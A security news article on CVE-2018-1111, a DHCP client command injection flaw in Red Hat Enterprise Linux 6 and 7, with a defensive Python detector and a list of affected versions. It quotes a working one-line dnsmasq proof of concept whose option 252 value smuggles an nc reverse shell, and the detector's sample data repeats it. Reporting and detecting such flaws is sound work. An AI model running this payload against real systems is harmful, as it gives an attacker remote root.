Red Hat has been made aware of a command injection flaw found in a script included in the DHCP client (dhclient) packages in Red Hat Enterprise Linux 6 and 7.
A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.
Red Hat has announced a critical vulnerability in its DHCP client, and while it doesn’t have a brand name, it does have a tweetable proof-of-concept.
Discovered by Googler Felix Wilhelm, CVE-2018-1111 is a command injection bug in the Red Hat Enterprise Linux and derivative DHCP clients.
Wilhelm tweeted: “CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivatives: https://access.redhat.com/security/vulnerabilities/3442151 …. Exploit fits in a tweet so you should patch as soon as possible.”
Here, in a tweet from Barkın Kılıç, is the PoC:
#CVE-2018-1111 tweetable PoC 🙂 dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat
Red Hat explained that “A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.”
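For defenders inspecting captured DHCP replies, the following Python code parses a DHCP options field and flags text options that carry shell metacharacters, as option 252 does in the PoC above. It is an added example, not code from Red Hat, the researchers or the original article. The helper names, the metacharacter set, the list of binary options and the sample options field are assumptions constructed for illustration.

```python
import re

# Characters that let a value escape shell quoting or chain a second command.
SHELL_META = re.compile(r"""['"`$&|;<>\\#\n\r]""")
# Options whose payload is fixed-format binary (RFC 2132): masks, addresses,
# timers, message type. Their bytes are not text, so they are not scanned.
BINARY_OPTIONS = {1, 3, 6, 28, 51, 53, 54, 58, 59}
PAD, END = 0, 255

def opt(code, value):
    """Encode one option as code, length, value."""
    return bytes([code, len(value)]) + value

def parse_options(blob):
    """Yield (code, value) from a DHCP options field, after the magic cookie."""
    i = 0
    while i < len(blob):
        code = blob[i]
        if code == END:
            return
        if code == PAD:
            i += 1
            continue
        if i + 1 >= len(blob):
            raise ValueError("truncated option header")
        length = blob[i + 1]
        value = blob[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("option %d truncated" % code)
        yield code, value
        i += 2 + length

def suspicious_options(blob):
    """Return [(code, text)] for text options carrying shell metacharacters."""
    hits = []
    for code, value in parse_options(blob):
        if code in BINARY_OPTIONS:
            continue
        text = value.decode("latin-1")
        if SHELL_META.search(text):
            hits.append((code, text))
    return hits

# Constructed DHCPACK options: the option 252 value is the one quoted in the PoC.
SAMPLE = (opt(53, b"\x05") + opt(3, bytes([10, 1, 1, 1])) + opt(6, bytes([10, 1, 1, 1]))
          + opt(252, b"x'&nc -e /bin/bash 10.1.1.1 1337 #") + bytes([END]))

if __name__ == "__main__":
    for code, text in suspicious_options(SAMPLE):
        print("option %d carries shell metacharacters: %r" % (code, text))
```

Binary options are skipped on purpose: a router address such as 10.1.1.39 contains the byte 0x27, which would otherwise be misread as a single quote.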
Here’s the full list of affected RHEL versions: Advanced Update Support 6.4; Extended Update Support 7.3; Advanced Update Support 6.6; Red Hat Enterprise Linux 6; Extended Update Support 6.7; Advanced Update Support 7.2; Server TUS (v.6.6); RHEL 7; Extended Update Support 7.4; Virtualization 4 Management Agent for RHEL 7 Hosts; Advanced Update Support 6.5; and Linux Server TUS (v. 7.2).